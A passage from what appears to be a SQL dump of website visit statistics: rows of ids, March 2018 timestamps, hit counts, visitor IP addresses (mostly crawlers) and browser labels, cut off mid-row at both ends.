,'other'),(216791,1520432884,1,1,0,0,'54.36.148.126','other'),(216792,1520432993,1,1,0,0,'54.36.148.193','other'),(216793,1520433014,1,1,0,0,'54.36.148.90','other'),(216794,1520433026,1,1,0,0,'54.36.149.6','other'),(216795,1520433297,1,1,0,0,'54.36.148.206','other'),(216796,1520433518,1,1,0,0,'54.36.148.28','other'),(216797,1520433606,1,1,0,0,'178.154.171.88','other'),(216798,1520433916,1,1,0,0,'54.36.149.90','other'),(216799,1520434048,1,1,0,0,'54.36.148.135','other'),(216800,1520434103,1,1,0,0,'87.250.224.46','other'),(216801,1520434166,1,1,0,0,'54.36.149.79','other'),(216802,1520434221,2,2,0,0,'91.196.178.44','chrome'),(216803,1520434256,1,1,0,0,'54.36.148.91','other'),(216804,1520434258,1,0,1,0,'66.249.66.157',''),(216805,1520434282,1,0,1,0,'66.249.66.156',''),(216806,1520434588,1,1,0,0,'54.36.149.73','other'),(216807,1520434652,1,1,0,0,'54.36.148.119','other'),(216808,1520434694,1,1,0,0,'54.36.148.34','other'),(216809,1520434793,1,1,0,0,'217.69.133.253','other'),(216810,1520434892,1,1,0,0,'52.3.247.79','other'),(216811,1520434936,1,1,0,0,'8.29.198.25','other'),(216812,1520435624,1,1,0,0,'46.133.184.111','chrome'),(216813,1520435636,1,1,0,0,'54.36.149.91','other'),(216814,1520435799,1,1,0,0,'54.36.148.32','other'),(216815,1520435816,1,1,0,0,'54.36.148.129','other'),(216816,1520435898,1,1,0,0,'54.36.148.238','other'),(216817,1520436137,1,1,0,0,'52.3.247.79','other'),(216818,1520436297,1,1,0,0,'54.36.148.77','other'),(216819,1520436702,1,1,0,0,'34.224.2.110','other'),(216820,1520436958,1,1,0,0,'91.196.178.65','firefox'),(216821,1520437162,1,1,0,0,'54.36.149.71','other'),(216822,1520437257,1,1,0,0,'217.69.133.23','other'),(216823,1520437321,1,1,0,0,'66.249.66.73','chrome'),(216824,1520437326,1,1,0,0,'66.249.66.75','chrome'),(216825,1520437369,1,1,0,0,'216.244.66.237','other'),(216826,1520437379,1,1,0,0,'54.36.148.173','other'),(216827,1520437396,1,1,0,0,'54.36.148.11','other'),(216828,1520437703,1,1,0,0,'54.36.148.42','other'),(216829,1520437746,1,1,0,0,'54.36.148.45','other'),(216830,1520437767,1,1,0,0,'54.36.148.165','other'),(216831,1520438005,1,1,0,0,'66.249.66.155','chrome'),(216832,1520438548,1,1,0,0,'157.55.39.36','other'),(216833,1520438583,1,1,0,0,'54.36.149.67','other'),(216834,1520438659,1,1,0,0,'54.36.148.151','other'),(216835,1520438682,1,1,0,0,'54.36.148.199','other'),(216836,1520438809,1,1,0,0,'54.36.149.88','other'),(216837,1520438826,2,2,0,0,'141.8.142.74','other'),(216838,1520438831,1,1,0,0,'37.9.113.182','other'),(216839,1520438910,1,1,0,0,'178.154.171.88','other'),(216840,1520439024,1,1,0,0,'188.230.43.254','other'),(216841,1520439060,1,1,0,0,'54.36.148.69','other'),(216842,1520439131,1,1,0,0,'54.36.148.172','other'),(216843,1520439237,1,1,0,0,'157.55.13.64','other'),(216844,1520439333,1,1,0,0,'217.69.136.210','other'),(216845,1520439423,1,1,0,0,'54.36.148.97','other'),(216846,1520439487,1,1,0,0,'54.36.149.23','other'),(216847,1520439505,2,2,0,0,'92.113.188.43','chrome'),(216848,1520439526,1,1,0,0,'54.36.148.115','other'),(216849,1520439635,1,1,0,0,'54.36.148.56','other'),(216850,1520439738,1,0,1,0,'66.249.66.195',''),(216851,1520439836,1,1,0,0,'178.154.171.88','other'),(216852,1520439838,1,1,0,0,'54.36.149.100','other'),(216853,1520440051,1,1,0,0,'217.69.133.11','other'),(216854,1520440131,1,1,0,0,'54.36.149.92','other'),(216855,1520440189,1,1,0,0,'54.36.148.26','other'),(216856,1520440363,1,1,0,0,'54.36.148.186','other'),(216857,1520440453,1,1,0,0,'141.8.142.74','other'),(216858,1520440618,1,1,0,0,'52.3.247.79','other'),(216859,1520440781,1,0,1,0,'66.249.66.73',''),(216860,1520440915,1,1,0,0,'54.36.148.128','other'),(216861,1520441011,1,1,0,0,'54.36.148.177','other'),(216862,1520441265,1,1,0,0,'54.36.148.80','other'),(216863,1520441420,1,1,0,0,'188.230.43.254','other'),(216864,1520441686,1,1,0,0,'54.36.149.11','other'),(216865,1520441709,1,1,0,0,'54.36.148.129','other'),(216866,1520441864,1,1,0,0,'54.36.148.119','other'),(216867,1520442035,1,1,0,0,'37.144.153.108','msie'),(216868,1520442040,1,1,0,0,'54.36.148.210','other'),(216869,1520442191,1,1,0,0,'54.36.149.18','other'),(216870,1520442371,1,1,0,0,'217.69.133.222','other'),(216871,1520442373,1,1,0,0,'217.69.133.225','other'),(216872,1520442374,2,2,0,0,'91.196.178.168','chrome'),(216873,1520442461,2,2,0,0,'54.36.149.23','other'),(216874,1520442668,1,1,0,0,'54.36.149.63','other'),(216875,1520442817,1,1,0,0,'54.36.149.107','other'),(216876,1520442841,1,1,0,0,'52.3.247.79','other'),(216877,1520442980,1,1,0,0,'93.75.8.57','firefox'),(216878,1520443080,1,1,0,0,'54.36.148.74','other'),(216879,1520443467,1,1,0,0,'54.36.149.99','other'),(216880,1520443524,1,1,0,0,'66.249.66.75','chrome'),(216881,1520443613,1,0,1,0,'66.249.66.158',''),(216882,1520444097,1,0,1,0,'66.249.66.157',''),(216883,1520444410,1,1,0,0,'66.249.66.157','chrome'),(216884,1520444422,1,1,0,0,'66.249.66.73','chrome'),(216885,1520444523,1,1,0,0,'54.36.148.76','other'),(216886,1520444639,1,1,0,0,'141.8.142.74','other'),(216887,1520445382,1,1,0,0,'54.36.148.56','other'),(216888,1520445389,2,2,0,0,'178.251.109.244','chrome'),(216889,1520445447,1,1,0,0,'54.36.148.40','other'),(216890,1520445585,1,1,0,0,'54.36.148.145','other'),(216891,1520445704,1,1,0,0,'54.36.148.249','other'),(216892,1520445780,1,1,0,0,'8.29.198.27','other'),(216893,1520445945,2,2,0,0,'91.196.178.135','firefox'),(216894,1520446098,1,1,0,0,'54.36.148.240','other'),(216895,1520446314,1,1,0,0,'54.36.148.163','other'),(216896,1520446389,1,1,0,0,'54.36.149.58','other'),(216898,1520446395,2,2,0,0,'178.251.109.244','chrome'),(216899,1520446450,1,1,0,0,'52.3.247.79','other'),(216900,1520446889,1,1,0,0,'141.8.142.74','other'),(216901,1520447004,1,1,0,0,'54.36.148.222','other'),(216902,1520447212,1,1,0,0,'54.36.149.94','other'),(216903,1520447566,1,1,0,0,'37.73.197.54','chrome'),(216904,1520447630,1,1,0,0,'34.224.2.110','other'),(216905,1520448845,1,1,0,0,'37.73.197.54','chrome'),(216906,1520449151,1,0,1,0,'66.249.66.74',''),(216907,1520449268,2,2,0,0,'66.249.66.74','chrome'),(216908,1520450033,1,1,0,0,'66.249.66.73','chrome'),(216909,1520450524,1,1,0,0,'178.154.171.88','other'),(216910,1520450536,2,2,0,0,'141.8.142.74','other'),(216911,1520450668,2,2,0,0,'91.196.178.86','chrome'),(216912,1520451015,1,1,0,0,'52.3.247.79','other'),(216913,1520451268,1,1,0,0,'37.73.243.21','chrome'),(216914,1520451621,1,0,1,0,'66.249.66.156',''),(216915,1520452024,1,1,0,0,'178.154.171.10','other'),(216916,1520452425,1,1,0,0,'46.219.220.11','chrome'),(216917,1520452456,1,1,0,0,'180.76.15.31','other'),(216918,1520452856,1,0,1,0,'66.249.66.76',''),(216919,1520452907,1,1,0,0,'54.36.149.36','other'),(216920,1520453119,1,1,0,0,'54.36.148.129','other'),(216921,1520453233,1,1,0,0,'54.36.148.108','other'),(216922,1520453267,4,4,0,0,'54.165.59.7','other'),(216923,1520453350,1,1,0,0,'54.36.149.3','other'),(216924,1520453566,1,1,0,0,'54.36.148.121','other'),(216925,1520453774,1,1,0,0,'54.36.149.2','other'),(216926,1520453811,1,1,0,0,'54.36.148.213','other'),(216927,1520453984,1,1,0,0,'54.36.148.110','other'),(216928,1520454072,1,1,0,0,'217.69.133.227','other'),(216929,1520454106,1,1,0,0,'141.8.142.74','other'),(216930,1520454401,1,1,0,0,'54.36.148.191','other'),(216931,1520454613,1,0,1,0,'66.249.66.157',''),(216932,1520454826,1,1,0,0,'54.36.148.109','other'),(216933,1520455226,1,1,0,0,'54.36.148.120','other'),(216934,1520455314,1,1,0,0,'66.249.66.73','chrome'),(216935,1520455339,1,1,0,0,'66.249.66.217','chrome'),(216936,1520455844,1,1,0,0,'54.36.149.32','other'),(216937,1520455902,1,1,0,0,'54.36.148.119','other'),(216938,1520456015,1,1,0,0,'54.36.149.71','other'),(216939,1520456456,1,1,0,0,'180.76.15.135','other'),(216940,1520456641,1,1,0,0,'8.29.198.25','other'),(216941,1520456776,1,1,0,0,'54.36.148.214','other'),(216942,1520456847,1,1,0,0,'54.36.148.186','other'),(216943,1520456879,1,1,0,0,'178.154.171.88','other'),(216944,1520456947,1,1,0,0,'54.36.149.102','other'),(216945,1520457073,1,1,0,0,'54.36.148.54','other'),(216946,1520457108,1,1,0,0,'141.8.142.74','other'),(216947,1520457324,1,1,0,0,'54.36.148.79','other'),(216948,1520457648,1,1,0,0,'54.36.148.48','other'),(216949,1520457802,1,1,0,0,'54.36.148.170','other'),(216950,1520457949,1,1,0,0,'54.36.149.55','other'),(216951,1520458057,1,1,0,0,'52.3.247.79','other'),(216952,1520458128,1,1,0,0,'217.69.136.207','other'),(216953,1520458129,1,1,0,0,'217.69.133.67','other'),(216954,1520458511,1,1,0,0,'54.36.149.57','other'),(216955,1520458580,1,1,0,0,'54.36.148.236','other'),(216956,1520459278,1,1,0,0,'141.8.142.74','other'),(216957,1520459994,1,1,0,0,'54.36.148.216','other'),(216958,1520460274,1,1,0,0,'54.36.148.251','other'),(216959,1520460361,1,0,1,0,'66.249.66.157',''),(216960,1520460533,1,1,0,0,'54.36.149.10','other'),(216961,1520460567,1,1,0,0,'217.69.133.239','other'),(216962,1520460657,1,1,0,0,'54.36.148.27','other'),(216963,1520460728,1,1,0,0,'54.36.149.80','other'),(216964,1520461119,1,1,0,0,'66.249.66.156','chrome'),(216965,1520461123,1,1,0,0,'66.249.66.157','chrome'),(216966,1520461286,1,1,0,0,'54.36.148.238','other'),(216967,1520461634,1,1,0,0,'54.36.148.127','other'),(216968,1520461646,1,1,0,0,'54.36.148.40','other'),(216969,1520462350,1,1,0,0,'54.36.149.70','other'),(216970,1520462792,1,1,0,0,'54.36.148.216','other'),(216971,1520463106,1,1,0,0,'52.3.247.79','other'),(216972,1520463156,1,1,0,0,'54.36.149.45','other'),(216973,1520463306,1,1,0,0,'54.36.148.164','other'),(216974,1520463372,1,0,1,0,'66.249.66.75',''),(216975,1520463732,1,1,0,0,'217.69.133.70','other'),(216976,1520463803,1,1,0,0,'157.55.39.213','other'),(216977,1520463886,1,1,0,0,'54.36.149.4','other'),(216978,1520464103,1,1,0,0,'54.36.148.24','other'),(216979,1520464239,1,1,0,0,'54.36.148.14','other'),(216980,1520464719,1,1,0,0,'54.36.149.61','other'),(216981,1520464814,1,1,0,0,'54.36.148.180','other'),(216982,1520464922,1,1,0,0,'54.36.148.59','other'),(216983,1520465090,1,1,0,0,'54.36.149.25','other'),(216984,1520465284,1,1,0,0,'54.36.148.242','other'),(216985,1520465432,1,1,0,0,'66.249.66.75','chrome'),(216986,1520465598,1,1,0,0,'54.36.148.163','other'),(216987,1520465608,1,1,0,0,'54.36.148.199','other'),(216988,1520465675,1,1,0,0,'54.36.148.251','other'),(216989,1520465938,1,1,0,0,'54.36.148.93','other'),(216990,1520466103,1,1,0,0,'157.55.39.213','other'),(216991,1520466366,1,1,0,0,'54.36.149.36','other'),(216992,1520466446,1,1,0,0,'52.3.247.79','other'),(216993,1520466651,1,1,0,0,'54.36.148.38','other'),(216994,1520466766,1,1,0,0,'54.36.149.80','other'),(216995,1520466955,1,1,0,0,'54.36.149.87','other'),(216996,1520467163,1,1,0,0,'54.36.148.205','other'),(216997,1520467200,1,1,0,0,'54.36.149.106','other'),(216998,1520467369,1,1,0,0,'54.36.149.9','other'),(216999,1520467429,1,0,1,0,'66.249.66.155',''),(217000,1520467476,1,1,0,0,'54.36.148.70','other'),(217001,1520467495,1,1,0,0,'8.29.198.27','other'),(217002,1520467512,1,1,0,0,'54.36.149.94','other'),(217003,1520467695,1,1,0,0,'52.3.247.79','other'),(217004,1520467705,1,1,0,0,'54.36.148.139','other'),(217005,1520467710,1,1,0,0,'54.36.148.236','other'),(217006,1520467717,1,0,1,0,'66.249.66.74',''),(217007,1520467785,1,1,0,0,'54.36.149.64','other'),(217008,1520467790,1,1,0,0,'54.36.148.221','other'),(217009,1520467810,1,1,0,0,'54.36.148.20','other'),(217010,1520468001,1,1,0,0,'54.36.148.170','other'),(217011,1520468067,1,1,0,0,'66.249.66.73','chrome'),(217012,1520468090,1,1,0,0,'66.249.66.219','chrome'),(217013,1520468371,1,1,0,0,'54.36.148.155','other'),(217014,1520468678,1,0,1,0,'66.249.66.199',''),(217015,1520468737,1,1,0,0,'54.36.148.66','other'),(217016,1520468917,1,1,0,0,'217.69.133.229','other'),(217017,1520469152,1,1,0,0,'54.36.148.217','other'),(217018,1520469385,1,1,0,0,'52.3.247.79','other'),(217019,1520470002,1,1,0,0,'54.36.149.71','other'),(217020,1520470435,1,1,0,0,'54.36.148.179','other'),(217021,1520470707,1,1,0,0,'128.75.50.155','msie'),(217022,1520470757,1,1,0,0,'52.3.247.79','other'),(217023,1520470759,1,1,0,0,'54.36.148.164','other'),(217024,1520470821,4,4,0,0,'141.8.142.74','other'),(217025,1520470963,1,1,0,0,'54.36.148.21','other'),(217026,1520470989,1,1,0,0,'54.36.148.217','other'),(217027,1520471068,1,1,0,0,'54.36.149.55','other'),(217028,1520471215,1,1,0,0,'54.36.148.37','other'),(217029,1520471736,1,1,0,0,'52.3.247.79','other'),(217030,1520471767,1,0,1,0,'66.249.66.73',''),(217031,1520472563,1,1,0,0,'89.178.232.55','chrome'),(217032,1520472564,1,1,0,0,'212.92.138.56','chrome'),(217033,1520472724,1,1,0,0,'52.3.247.79','other'),(217034,1520472759,1,1,0,0,'54.36.148.119','other'),(217035,1520472874,1,1,0,0,'18.231.89.163','msie'),(217036,1520473487,1,1,0,0,'217.69.136.209','other'),(217037,1520473591,1,1,0,0,'54.36.149.89','other'),(217038,1520473723,1,1,0,0,'52.3.247.79','other'),(217039,1520473988,1,1,0,0,'18.231.89.163','msie'),(217040,1520474330,1,1,0,0,'54.36.148.128','other'),(217041,1520474333,1,0,1,0,'66.249.66.73',''),(217042,1520474363,1,1,0,0,'54.36.149.51','other'),(217043,1520474825,1,1,0,0,'54.36.148.87','other'),(217044,1520474953,1,1,0,0,'54.36.148.39','other'),(217045,1520475039,1,1,0,0,'87.250.224.46','other'),(217046,1520475111,1,1,0,0,'52.3.247.79','other'),(217047,1520475130,1,1,0,0,'54.36.148.137','other'),(217048,1520475186,1,1,0,0,'54.36.148.106','other'),(217049,1520475297,1,0,1,0,'66.249.66.157',''),(217050,1520475390,2,1,1,0,'66.249.66.74',''),(217051,1520475393,1,1,0,0,'66.249.66.156','chrome'),(217052,1520475453,1,1,0,0,'54.36.148.125','other'),(217053,1520475566,1,1,0,0,'54.36.148.143','other'),(217054,1520475718,1,1,0,0,'54.36.148.74','other'),(217055,1520475739,1,0,1,0,'66.249.66.75',''),(217056,1520475937,1,1,0,0,'37.147.251.140','msie'),(217057,1520475938,1,1,0,0,'95.79.142.162','msie'),(217058,1520475996,1,1,0,0,'54.36.148.38','other'),(217059,1520476087,1,1,0,0,'52.3.247.79','other'),(217060,1520476611,1,1,0,0,'217.69.133.230','other'),(217061,1520476880,1,1,0,0,'54.36.148.180','other'),(217062,1520477147,1,1,0,0,'54.36.148.99','other'),(217063,1520477205,1,1,0,0,'52.3.247.79','other'),(217064,1520477342,1,1,0,0,'54.36.149.37','other'),(217065,1520477353,1,1,0,0,'54.36.148.129','other'),(217066,1520478188,1,1,0,0,'52.3.247.79','other'),(217067,1520478336,1,1,0,0,'8.29.198.25','other'),(217068,1520478628,1,1,0,0,'51.255.66.115','other'),(217069,1520478752,1,1,0,0,'37.9.113.101','other'),(217070,1520478811,1,1,0,0,'141.8.142.74','other'),(217071,1520478896,1,1,0,0,'146.52.142.118','other'),(217072,1520479743,1,1,0,0,'66.249.66.199','chrome'),(217073,1520479842,1,1,0,0,'52.3.247.79','other'),(217074,1520480010,1,1,0,0,'217.69.133.239','other'),(217075,1520480083,1,1,0,0,'54.36.148.237','other'),(217076,1520480685,1,1,0,0,'54.36.148.130','other'),(217077,1520480754,1,1,0,0,'52.3.247.79','other'),(217078,1520481080,1,1,0,0,'54.36.149.13','other'),(217079,1520481361,1,0,1,0,'66.249.66.195',''),(217080,1520481377,1,1,0,0,'54.36.148.28','other'),(217081,1520481539,17,17,0,0,'144.76.138.165','other'),(217082,1520481940,1,1,0,0,'66.249.66.195','chrome'),(217083,1520481945,1,1,0,0,'66.249.66.157','chrome'),(217084,1520482400,1,1,0,0,'54.36.148.82','other'),(217085,1520482607,1,1,0,0,'52.3.247.79','other'),(217086,1520482904,1,1,0,0,'54.36.149.36','other'),(217087,1520482955,1,1,0,0,'141.8.142.74','other'),(217088,1520483147,1,1,0,0,'54.36.149.78','other'),(217089,1520483613,1,1,0,0,'54.36.148.105','other'),(217090,1520483627,1,1,0,0,'54.36.148.151','other'),(217091,1520483930,1,1,0,0,'217.69.133.14','other'),(217092,1520484536,1,1,0,0,'54.36.148.39','other'),(217093,1520484537,1,1,0,0,'141.8.142.74','other'),(217094,1520484552,1,1,0,0,'54.36.148.18','other'),(217095,1520484842,1,1,0,0,'54.36.148.107','other'),(217096,1520485100,1,1,0,0,'52.3.247.79','other'),(217097,1520485687,1,1,0,0,'54.36.148.74','other'),(217098,1520485747,1,1,0,0,'141.8.142.74','other'),(217099,1520485964,1,1,0,0,'217.69.133.229','other'),(217100,1520485997,1,1,0,0,'54.36.149.81','other'),(217101,1520486134,1,1,0,0,'151.80.203.177','chrome'),(217102,1520486177,1,1,0,0,'52.3.247.79','other'),(217103,1520486215,1,1,0,0,'54.36.149.23','other'),(217104,1520486436,1,1,0,0,'54.36.148.160','other'),(217105,1520486499,1,1,0,0,'54.36.148.171','other'),(217106,1520486590,1,1,0,0,'54.36.149.19','other'),(217107,1520486840,1,1,0,0,'217.69.133.241','other'),(217108,1520486897,1,0,1,0,'66.249.66.156',''),(217109,1520486972,1,0,1,0,'66.249.66.201',''),(217110,1520487017,1,1,0,0,'54.36.148.123','other'),(217111,1520487039,1,1,0,0,'54.36.149.50','other'),(217112,1520487043,1,1,0,0,'217.69.133.240','other'),(217113,1520487366,1,1,0,0,'66.249.66.195','chrome'),(217114,1520487374,1,1,0,0,'66.249.66.156','chrome'),(217115,1520487398,1,1,0,0,'54.36.148.221','other'),(217116,1520487427,1,1,0,0,'54.36.149.13','other'),(217117,1520487468,1,1,0,0,'54.36.148.16','other'),(217118,1520487549,1,1,0,0,'52.3.247.79','other'),(217119,1520487911,1,1,0,0,'178.154.171.88','other'),(217120,1520488004,1,1,0,0,'54.36.148.33','other'),(217121,1520488043,1,1,0,0,'217.69.133.216','other'),(217122,1520488283,1,1,0,0,'54.36.148.215','other'),(217123,1520488502,1,1,0,0,'52.3.247.79','other'),(217124,1520488761,2,2,0,0,'87.250.224.46','other'),(217125,1520488774,1,1,0,0,'141.8.142.74','other'),(217126,1520488970,1,1,0,0,'54.36.148.154','other'),(217127,1520489200,1,1,0,0,'8.29.198.27','other'),(217128,1520489315,1,1,0,0,'54.36.148.247','other'),(217129,1520489716,1,1,0,0,'54.36.149.7','other'),(217130,1520489755,1,0,1,0,'66.249.66.199',''),(217131,1520489852,1,1,0,0,'52.3.247.79','other'),(217132,1520490418,1,1,0,0,'54.36.148.21','other'),(217133,1520490803,1,1,0,0,'52.3.247.79','other'),(217134,1520491041,1,1,0,0,'54.36.149.52','other'),(217135,1520491141,1,1,0,0,'54.36.148.248','other'),(217136,1520491764,1,1,0,0,'54.36.149.34','other'),(217137,1520491829,1,1,0,0,'54.36.148.51','other'),(217138,1520491831,1,1,0,0,'52.3.247.79','other'),(217139,1520491935,1,1,0,0,'54.36.149.69','other'),(217140,1520491966,1,1,0,0,'54.36.148.16','other'),(217141,1520492066,1,1,0,0,'54.36.148.196','other'),(217142,1520492210,1,1,0,0,'178.154.171.88','other'),(217143,1520492294,1,1,0,0,'217.69.133.12','other'),(217144,1520492355,1,1,0,0,'54.36.148.162','other'),(217145,1520492592,1,1,0,0,'54.36.148.169','other'),(217146,1520492631,1,1,0,0,'54.36.149.29','other'),(217147,1520492644,1,1,0,0,'141.8.142.74','other'),(217148,1520492745,1,1,0,0,'54.36.148.182','other'),(217149,1520492764,1,1,0,0,'54.36.149.75','other'),(217150,1520492846,1,1,0,0,'52.3.247.79','other'),(217151,1520492851,1,1,0,0,'66.249.66.201','chrome'),(217152,1520492855,1,1,0,0,'66.249.66.157','chrome'),(217153,1520492961,2,2,0,0,'54.36.148.255','other'),(217154,1520493502,1,1,0,0,'54.36.148.58','other'),(217155,1520493627,2,2,0,0,'178.154.171.88','other'),(217156,1520493645,1,1,0,0,'54.36.148.169','other'),(217157,1520493883,1,1,0,0,'52.3.247.79','other'),(217158,1520494307,1,1,0,0,'54.36.149.67','other'),(217159,1520494602,1,1,0,0,'54.36.148.38','other'),(217160,1520494643,1,1,0,0,'54.36.148.236','other'),(217161,1520494720,1,1,0,0,'217.69.133.224','other'),(217162,1520494800,1,1,0,0,'52.3.247.79','other'),(217163,1520495214,1,1,0,0,'54.36.148.113','other'),(217164,1520495219,1,1,0,0,'54.36.148.65','other'),(217165,1520495324,1,1,0,0,'54.36.148.145','other'),(217166,1520495476,1,1,0,0,'217.69.133.229','other'),(217167,1520495506,1,1,0,0,'54.36.148.139','other'),(217168,1520495758,1,1,0,0,'217.69.133.30','other'),(217169,1520495760,1,1,0,0,'217.69.133.60','other'),(217170,1520496046,1,1,0,0,'216.244.66.237','other'),(217171,1520496174,1,1,0,0,'54.36.148.73','other'),(217172,1520496311,1,1,0,0,'54.165.59.7','other'),(217173,1520496578,1,0,1,0,'66.249.66.158',''),(217174,1520496649,1,1,0,0,'54.36.148.173','other'),(217175,1520497056,1,1,0,0,'54.36.148.214','other'),(217176,1520497097,1,1,0,0,'54.36.148.106','other'),(217177,1520497198,1,1,0,0,'54.36.149.104','other'),(217178,1520497267,1,1,0,0,'178.154.171.88','other'),(217179,1520497300,1,1,0,0,'52.3.247.79','other'),(217180,1520497302,1,1,0,0,'54.36.149.96','other'),(217181,1520497408,1,1,0,0,'54.36.148.26','other'),(217182,1520497441,1,1,0,0,'54.36.148.172','other'),(217183,1520497545,2,0,2,0,'66.249.66.201',''),(217184,1520497653,1,1,0,0,'54.36.149.20','other'),(217185,1520497690,1,1,0,0,'178.203.120.211','other'),(217186,1520497711,1,1,0,0,'54.36.149.47','other'),(217187,1520497870,1,1,0,0,'54.36.148.191','other'),(217188,1520498236,1,1,0,0,'52.3.247.79','other'),(217189,1520498524,1,1,0,0,'54.36.149.77','other'),(217190,1520498547,1,1,0,0,'54.36.149.65','other'),(217191,1520498718,1,1,0,0,'54.36.148.193','other'),(217192,1520498829,1,1,0,0,'54.36.148.85','other'),(217193,1520498834,7,7,0,0,'178.154.171.88','other'),(217194,1520498899,1,1,0,0,'54.36.148.158','other'),(217195,1520498919,7,7,0,0,'141.8.142.74','other'),(217196,1520498927,1,1,0,0,'217.69.133.70','other'),(217197,1520499238,2,2,0,0,'173.208.200.154','other'),(217198,1520499331,2,2,0,0,'91.196.178.164','chrome'),(217199,1520499359,1,1,0,0,'52.3.247.79','other'),(217200,1520499589,1,1,0,0,'54.36.148.146','other'),(217201,1520499889,1,1,0,0,'54.36.148.189','other'),(217202,1520500053,1,1,0,0,'8.29.198.26','other'),(217203,1520500376,1,1,0,0,'52.3.247.79','other'),(217204,1520500694,1,1,0,0,'54.36.149.96','other'),(217205,1520500880,1,0,1,0,'66.249.66.199',''),(217206,1520501184,1,1,0,0,'54.36.148.124','other'),(217207,1520501278,1,1,0,0,'52.3.247.79','other'),(217208,1520501305,1,1,0,0,'54.36.149.60','other'),(217209,1520501764,1,0,1,0,'66.249.66.195',''),(217210,1520502291,1,1,0,0,'52.3.247.79','other'),(217211,1520502382,1,1,0,0,'54.36.149.75','other'),(217212,1520502389,1,1,0,0,'54.36.149.70','other'),(217213,1520502801,1,1,0,0,'54.36.148.235','other'),(217214,1520503115,1,1,0,0,'217.69.133.238','other'),(217215,1520503208,1,1,0,0,'52.3.247.79','other'),(217216,1520503399,1,1,0,0,'54.36.148.66','other'),(217217,1520503590,1,1,0,0,'178.154.171.88','other'),(217218,1520503982,1,1,0,0,'54.36.148.199','other'),(217219,1520504008,1,1,0,0,'141.8.142.74','other'),(217220,1520504009,1,1,0,0,'54.36.148.188','other'),(217221,1520504157,1,1,0,0,'54.36.148.154','other'),(217222,1520504305,1,1,0,0,'52.3.247.79','other'),(217223,1520504376,1,1,0,0,'54.36.148.25','other'),(217224,1520504523,1,1,0,0,'54.36.148.70','other'),(217225,1520504528,1,1,0,0,'54.36.149.82','other'),(217226,1520504540,1,1,0,0,'54.36.148.247','other'),(217227,1520504555,1,1,0,0,'54.36.149.6','other'),(217228,1520504669,1,1,0,0,'54.36.149.94','other'),(217229,1520504679,1,1,0,0,'217.69.136.208','other'),(217230,1520504708,1,1,0,0,'54.36.149.60','other'),(217231,1520504794,1,1,0,0,'217.69.133.229','other'),(217232,1520505036,1,1,0,0,'54.36.148.121','other'),(217233,1520505234,1,1,0,0,'52.3.247.79','other'),(217234,1520505866,1,1,0,0,'54.36.148.172','other'),(217235,1520505905,1,1,0,0,'54.36.148.183','other'),(217236,1520506094,1,1,0,0,'54.36.148.227','other'),(217237,1520506106,1,1,0,0,'217.69.133.72','other'),(217238,1520506119,1,1,0,0,'54.36.148.94','other'),(217239,1520506395,1,1,0,0,'54.36.148.46','other'),(217240,1520506628,1,1,0,0,'52.3.247.79','other'),(217241,1520506793,1,1,0,0,'54.36.148.107','other'),(217242,1520507005,1,1,0,0,'54.36.148.36','other'),(217243,1520507058,1,1,0,0,'54.36.148.214','other'),(217244,1520507156,1,1,0,0,'54.36.149.24','other'),(217245,1520507417,1,0,1,0,'66.249.66.157',''),(217246,1520507421,1,1,0,0,'54.36.149.98','other'),(217247,1520507436,1,1,0,0,'157.55.39.213','other'),(217248,1520507539,1,1,0,0,'66.249.66.195','chrome'),(217249,1520507543,1,1,0,0,'66.249.66.158','chrome'),(217250,1520507804,1,1,0,0,'217.69.133.240','other'),(217251,1520507815,1,1,0,0,'54.36.148.108','other'),(217252,1520508072,1,0,1,0,'66.249.66.201',''),(217253,1520508178,1,1,0,0,'54.36.148.86','other'),(217254,1520508207,1,1,0,0,'54.36.149.92','other'),(217255,1520508291,1,1,0,0,'52.3.247.79','other'),(217256,1520508377,1,1,0,0,'54.36.149.29','other'),(217257,1520508385,1,1,0,0,'54.36.148.95','other'),(217258,1520508603,1,1,0,0,'54.36.148.210','other'),(217260,1520508636,1,1,0,0,'54.36.148.71','other'),(217261,1520508956,1,0,1,0,'66.249.66.199',''),(217262,1520509282,1,1,0,0,'52.3.247.79','other'),(217263,1520509404,1,1,0,0,'54.36.148.156','other'),(217264,1520510035,1,1,0,0,'141.8.142.74','other'),(217265,1520510241,1,1,0,0,'52.3.247.79','other'),(217266,1520510900,1,1,0,0,'87.250.224.46','other'),(217267,1520510902,1,1,0,0,'8.29.198.25','other'),(217268,1520510979,1,1,0,0,'54.36.148.161','other'),(217269,1520510994,1,1,0,0,'178.154.171.88','other'),(217270,1520511087,1,1,0,0,'54.36.148.233','other'),(217271,1520511447,1,1,0,0,'54.36.148.12','other'),(217272,1520511550,1,1,0,0,'54.36.148.206','other'),(217273,1520511726,1,0,1,0,'66.249.66.199',''),(217274,1520511838,1,1,0,0,'91.209.11.236','other'),(217275,1520511934,1,0,1,0,'66.249.66.195',''),(217276,1520512106,1,1,0,0,'54.36.148.58','other'),(217277,1520512135,1,1,0,0,'54.36.148.253','other'),(217278,1520512430,1,0,1,0,'66.249.66.201',''),(217279,1520512683,1,1,0,0,'54.36.148.121','other'),(217280,1520512872,1,1,0,0,'54.36.148.105','other'),(217281,1520513040,1,1,0,0,'54.36.148.71','other'),(217282,1520513164,1,1,0,0,'66.249.66.199','chrome'),(217283,1520513169,1,1,0,0,'66.249.66.156','chrome'),(217284,1520513419,1,1,0,0,'54.36.148.108','other'),(217285,1520513424,1,1,0,0,'54.36.148.180','other'),(217286,1520513461,1,1,0,0,'54.36.148.254','other'),(217287,1520513654,1,1,0,0,'217.69.133.237','other'),(217288,1520514989,1,1,0,0,'66.249.66.157','chrome'),(217289,1520515817,1,1,0,0,'87.250.224.46','other'),(217290,1520515983,1,1,0,0,'54.36.148.17','other'),(217291,1520515987,1,1,0,0,'216.244.66.237','other'),(217292,1520516335,1,0,1,0,'66.249.66.157',''),(217293,1520516408,1,1,0,0,'54.36.149.105','other'),(217294,1520516486,1,1,0,0,'54.36.148.66','other'),(217295,1520516668,1,1,0,0,'217.69.133.14','other'),(217296,1520516817,1,1,0,0,'54.36.148.172','other'),(217297,1520517226,1,1,0,0,'54.36.149.0','other'),(217298,1520517284,1,1,0,0,'54.36.148.179','other'),(217299,1520517305,1,1,0,0,'89.178.233.203','msie'),(217300,1520517537,1,1,0,0,'54.36.148.200','other'),(217301,1520517845,7,7,0,0,'31.43.125.145','other'),(217302,1520517959,1,1,0,0,'54.36.149.44','other'),(217303,1520518148,1,1,0,0,'52.3.247.79','other'),(217304,1520518474,1,1,0,0,'54.36.148.22','other'),(217305,1520518568,1,1,0,0,'54.36.148.202','other'),(217306,1520519019,1,1,0,0,'54.36.149.4','other'),(217307,1520519127,1,1,0,0,'52.3.247.79